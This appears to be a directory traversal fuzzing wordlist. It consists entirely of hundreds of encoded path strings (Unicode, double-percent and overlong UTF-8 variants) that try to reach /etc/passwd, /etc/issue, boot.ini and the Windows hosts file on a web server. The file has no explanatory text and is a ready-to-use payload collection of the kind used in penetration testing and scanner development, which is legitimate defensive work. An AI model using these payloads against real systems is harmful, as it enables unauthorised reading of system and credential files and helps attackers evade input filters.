-.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215etc%u2215passwd -.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215etc%u2215issue -.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215boot.ini -.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215etc%u2215passwd -.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215etc%u2215issue -.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215boot.ini -.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.%2e%u2216etc%u2216passwd -.%2e%u2216etc%u2216issue -.%2e%u2216boot.ini -.%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.%2e%u2216.%2e%u2216etc%u2216passwd -.%2e%u2216.%2e%u2216etc%u2216issue -.%2e%u2216.%2e%u2216boot.ini -.%2e%u2216.%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.%2e%u2216.%2e%u2216.%2e%u2216etc%u2216passwd -.%2e%u2216.%2e%u2216.%2e%u2216etc%u2216issue -.%2e%u2216.%2e%u2216.%2e%u2216boot.ini -.%2e%u2216.%2e%u2216.%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216etc%u2216passwd -.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216etc%u2216issue -.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216boot.ini -.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216etc%u2216passwd -.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216etc%u2216issue -.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216boot.ini -.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216etc%u2216passwd -.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216etc%u2216issue -.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216boot.ini -.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216.%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.%2e%uEFC8etc%uEFC8passwd -.%2e%uEFC8etc%uEFC8issue -.%2e%uEFC8boot.ini -.%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.%2e%uEFC8.%2e%uEFC8etc%uEFC8passwd -.%2e%uEFC8.%2e%uEFC8etc%uEFC8issue -.%2e%uEFC8.%2e%uEFC8boot.ini -.%2e%uEFC8.%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8etc%uEFC8passwd -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8etc%uEFC8issue -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8boot.ini -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8etc%uEFC8passwd -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8etc%uEFC8issue -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8boot.ini -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8etc%uEFC8passwd -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8etc%uEFC8issue -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8boot.ini -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8etc%uEFC8passwd -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8etc%uEFC8issue -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8boot.ini -.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8.%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.%2e%uF025etc%uF025passwd -.%2e%uF025etc%uF025issue -.%2e%uF025boot.ini -.%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.%2e%uF025.%2e%uF025etc%uF025passwd -.%2e%uF025.%2e%uF025etc%uF025issue -.%2e%uF025.%2e%uF025boot.ini -.%2e%uF025.%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.%2e%uF025.%2e%uF025.%2e%uF025etc%uF025passwd -.%2e%uF025.%2e%uF025.%2e%uF025etc%uF025issue -.%2e%uF025.%2e%uF025.%2e%uF025boot.ini -.%2e%uF025.%2e%uF025.%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025etc%uF025passwd -.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025etc%uF025issue -.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025boot.ini -.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025etc%uF025passwd -.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025etc%uF025issue -.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025boot.ini -.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025etc%uF025passwd -.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025etc%uF025issue -.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025boot.ini -.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025.%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.%2e%%32%%66etc%%32%%66passwd -.%2e%%32%%66etc%%32%%66issue -.%2e%%32%%66boot.ini -.%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.%2e%%32%%66.%2e%%32%%66etc%%32%%66passwd -.%2e%%32%%66.%2e%%32%%66etc%%32%%66issue -.%2e%%32%%66.%2e%%32%%66boot.ini -.%2e%%32%%66.%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66etc%%32%%66passwd -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66etc%%32%%66issue -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66boot.ini -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66etc%%32%%66passwd -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66etc%%32%%66issue -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66boot.ini -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66etc%%32%%66passwd -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66etc%%32%%66issue -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66boot.ini -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66etc%%32%%66passwd -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66etc%%32%%66issue -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66boot.ini -.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66.%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.%2e%%35%%63etc%%35%%63passwd -.%2e%%35%%63etc%%35%%63issue -.%2e%%35%%63boot.ini -.%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.%2e%%35%%63.%2e%%35%%63etc%%35%%63passwd -.%2e%%35%%63.%2e%%35%%63etc%%35%%63issue -.%2e%%35%%63.%2e%%35%%63boot.ini -.%2e%%35%%63.%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63etc%%35%%63passwd -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63etc%%35%%63issue -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63boot.ini -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63etc%%35%%63passwd -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63etc%%35%%63issue -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63boot.ini -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63etc%%35%%63passwd -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63etc%%35%%63issue -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63boot.ini -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63etc%%35%%63passwd -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63etc%%35%%63issue -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63boot.ini -.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63.%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.%2e%e0%80%afetc%e0%80%afpasswd -.%2e%e0%80%afetc%e0%80%afissue -.%2e%e0%80%afboot.ini -.%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.%2e%e0%80%af.%2e%e0%80%afetc%e0%80%afpasswd -.%2e%e0%80%af.%2e%e0%80%afetc%e0%80%afissue -.%2e%e0%80%af.%2e%e0%80%afboot.ini -.%2e%e0%80%af.%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afetc%e0%80%afpasswd -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afetc%e0%80%afissue -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afboot.ini -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afetc%e0%80%afpasswd -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afetc%e0%80%afissue -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afboot.ini -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afetc%e0%80%afpasswd -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afetc%e0%80%afissue -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afboot.ini -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afetc%e0%80%afpasswd -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afetc%e0%80%afissue -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afboot.ini -.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%af.%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.%2e%25c1%259cetc%25c1%259cpasswd -.%2e%25c1%259cetc%25c1%259cissue -.%2e%25c1%259cboot.ini -.%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.%2e%25c1%259c.%2e%25c1%259cetc%25c1%259cpasswd -.%2e%25c1%259c.%2e%25c1%259cetc%25c1%259cissue -.%2e%25c1%259c.%2e%25c1%259cboot.ini -.%2e%25c1%259c.%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cetc%25c1%259cpasswd -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cetc%25c1%259cissue -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cboot.ini -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cetc%25c1%259cpasswd -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cetc%25c1%259cissue -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cboot.ini -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cetc%25c1%259cpasswd -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cetc%25c1%259cissue -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cboot.ini -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cetc%25c1%259cpasswd -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cetc%25c1%259cissue -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cboot.ini -.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259c.%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.%2e%25c0%25afetc%25c0%25afpasswd -.%2e%25c0%25afetc%25c0%25afissue -.%2e%25c0%25afboot.ini -.%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.%2e%25c0%25af.%2e%25c0%25afetc%25c0%25afpasswd -.%2e%25c0%25af.%2e%25c0%25afetc%25c0%25afissue -.%2e%25c0%25af.%2e%25c0%25afboot.ini -.%2e%25c0%25af.%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afetc%25c0%25afpasswd -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afetc%25c0%25afissue -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afboot.ini -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afetc%25c0%25afpasswd -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afetc%25c0%25afissue -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afboot.ini -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afetc%25c0%25afpasswd -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afetc%25c0%25afissue -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afboot.ini -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afetc%25c0%25afpasswd -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afetc%25c0%25afissue -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afboot.ini -.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25af.%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.%2e%f0%80%80%afetc%f0%80%80%afpasswd -.%2e%f0%80%80%afetc%f0%80%80%afissue -.%2e%f0%80%80%afboot.ini -.%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.%2e%f0%80%80%af.%2e%f0%80%80%afetc%f0%80%80%afpasswd -.%2e%f0%80%80%af.%2e%f0%80%80%afetc%f0%80%80%afissue -.%2e%f0%80%80%af.%2e%f0%80%80%afboot.ini -.%2e%f0%80%80%af.%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afetc%f0%80%80%afpasswd -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afetc%f0%80%80%afissue -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afboot.ini -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afetc%f0%80%80%afpasswd -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afetc%f0%80%80%afissue -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afboot.ini -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afetc%f0%80%80%afpasswd -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afetc%f0%80%80%afissue -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afboot.ini -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afetc%f0%80%80%afpasswd -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afetc%f0%80%80%afissue -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afboot.ini -.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%af.%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -.%2e%f8%80%80%80%afboot.ini -.%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afboot.ini -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afboot.ini -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afboot.ini -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afboot.ini -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afboot.ini -.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%af.%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%2e./etc/passwd -%2e./etc/issue -%2e./boot.ini -%2e./windows/system32/drivers/etc/hosts -%2e./%2e./etc/passwd -%2e./%2e./etc/issue -%2e./%2e./boot.ini -%2e./%2e./windows/system32/drivers/etc/hosts -%2e./%2e./%2e./etc/passwd -%2e./%2e./%2e./etc/issue -%2e./%2e./%2e./boot.ini -%2e./%2e./%2e./windows/system32/drivers/etc/hosts -%2e./%2e./%2e./%2e./etc/passwd -%2e./%2e./%2e./%2e./etc/issue -%2e./%2e./%2e./%2e./boot.ini -%2e./%2e./%2e./%2e./windows/system32/drivers/etc/hosts -%2e./%2e./%2e./%2e./%2e./etc/passwd -%2e./%2e./%2e./%2e./%2e./etc/issue -%2e./%2e./%2e./%2e./%2e./boot.ini -%2e./%2e./%2e./%2e./%2e./windows/system32/drivers/etc/hosts -%2e./%2e./%2e./%2e./%2e./%2e./etc/passwd -%2e./%2e./%2e./%2e./%2e./%2e./etc/issue -%2e./%2e./%2e./%2e./%2e./%2e./boot.ini -%2e./%2e./%2e./%2e./%2e./%2e./windows/system32/drivers/etc/hosts -%2e.\etc\passwd -%2e.\etc\issue -%2e.\boot.ini -%2e.\windows\system32\drivers\etc\hosts -%2e.\%2e.\etc\passwd -%2e.\%2e.\etc\issue -%2e.\%2e.\boot.ini -%2e.\%2e.\windows\system32\drivers\etc\hosts -%2e.\%2e.\%2e.\etc\passwd -%2e.\%2e.\%2e.\etc\issue -%2e.\%2e.\%2e.\boot.ini -%2e.\%2e.\%2e.\windows\system32\drivers\etc\hosts -%2e.\%2e.\%2e.\%2e.\etc\passwd -%2e.\%2e.\%2e.\%2e.\etc\issue -%2e.\%2e.\%2e.\%2e.\boot.ini -%2e.\%2e.\%2e.\%2e.\windows\system32\drivers\etc\hosts -%2e.\%2e.\%2e.\%2e.\%2e.\etc\passwd -%2e.\%2e.\%2e.\%2e.\%2e.\etc\issue -%2e.\%2e.\%2e.\%2e.\%2e.\boot.ini -%2e.\%2e.\%2e.\%2e.\%2e.\windows\system32\drivers\etc\hosts -%2e.\%2e.\%2e.\%2e.\%2e.\%2e.\etc\passwd -%2e.\%2e.\%2e.\%2e.\%2e.\%2e.\etc\issue 